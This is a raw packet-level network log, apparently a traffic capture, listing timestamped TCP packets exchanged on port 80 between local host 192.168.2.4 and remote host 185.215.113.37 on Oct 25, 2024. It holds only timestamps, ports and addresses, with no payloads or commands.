Oct 25, 2024 05:21:12.607063055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.607079029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.607099056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.607111931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.607146978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.607176065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.607176065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.607209921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.760385990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.760493040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.760509968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.760565042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.760576010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.760617971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.760631084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.760664940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.760703087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.760729074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.760732889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.760790110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.760811090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.760843992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.760865927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.760876894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.760895014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.760910988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.760927916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.760963917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.760987997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761055946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761060953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761122942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761137962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761185884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761187077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761215925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761244059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761248112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761274099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761281967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761298895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761315107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761341095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761351109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761364937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761384964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761406898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761419058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761449099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761452913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761476994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761487007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761518002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761518955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761539936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761553049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761581898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761588097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761607885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761615992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761630058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761650085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761674881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761682987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761698961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761715889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761739016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761744976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761773109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761776924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761811018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761812925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761835098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761841059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761863947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761876106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761900902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761909008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761939049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761960030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.761967897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.761997938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762017012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762051105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762067080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762121916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762130976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762190104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762192965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762234926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762249947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762296915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762314081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762372017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762377024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762409925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762435913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762460947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762471914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762504101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762537003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762537956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762557030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762568951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762597084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762603045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762618065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762636900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762658119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762686968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762687922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762727022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762744904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762789965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762794018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762850046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762856007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762890100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762913942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762927055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762953043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.762960911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.762989998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763019085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763029099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763061047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763087988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763094902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763118982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763147116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763158083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763190985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763221979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763240099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763240099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763254881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763284922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763286114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763307095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763339043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763371944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763391972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763401985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763458014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763463974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763495922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763521910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763528109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763545990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763556957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763583899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763590097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763605118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763644934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763653040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763686895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763709068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763719082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763751984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763756037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763778925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763801098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763830900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763889074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763891935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763953924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.763955116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.763983965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764012098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764041901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764046907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764101028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764108896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764168024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764170885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764226913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764235020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764262915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764292002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764317036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764322042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764378071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764384985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764417887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764439106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764456034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764478922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764504910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764513969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764555931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764571905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764600992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764630079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764651060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764662027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764714956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764724016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764776945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764782906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764838934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764847040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764906883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.764908075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764962912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.764971972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765028000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765033960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765089989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765098095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765131950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765168905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765189886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765192986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765227079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765252113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765260935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765276909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765316963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765327930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765384912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765387058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765441895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765453100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765480995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765512943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765531063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765542984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765607119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765613079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765640020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765666008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765702963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765705109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765736103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765760899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765772104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765798092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765808105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765827894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765841007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765856981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765872955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765897036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765906096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765932083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765934944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765966892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.765993118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.765993118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766000032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766015053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766036034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766056061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766069889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766102076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766123056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766123056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766136885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766144991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766165018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766199112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766201019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766222954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766233921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766252995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766267061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766292095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766299963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766330957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766333103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766356945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766367912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766390085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766401052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766427040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766434908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766449928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766468048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766494989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766500950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766519070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766529083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766557932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766562939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766578913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766596079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766618013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766628027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766654968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766661882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766695023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766701937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766726971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766729116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766745090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766757011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766789913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766792059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766813040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766825914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766851902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766860008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766876936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766892910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766910076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766925097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766948938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766958952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.766978979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.766992092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.767021894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.767030001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.767046928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.767064095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.767087936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.767096996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.767118931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.767129898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.767154932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.767158985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.767179012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.767191887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.767208099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.767208099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.767225027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.767240047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.767246008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.767256021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.767268896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.767272949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.767294884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.767309904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.767328978 CEST	49730	80	192.168.2.4	185.215.113.37
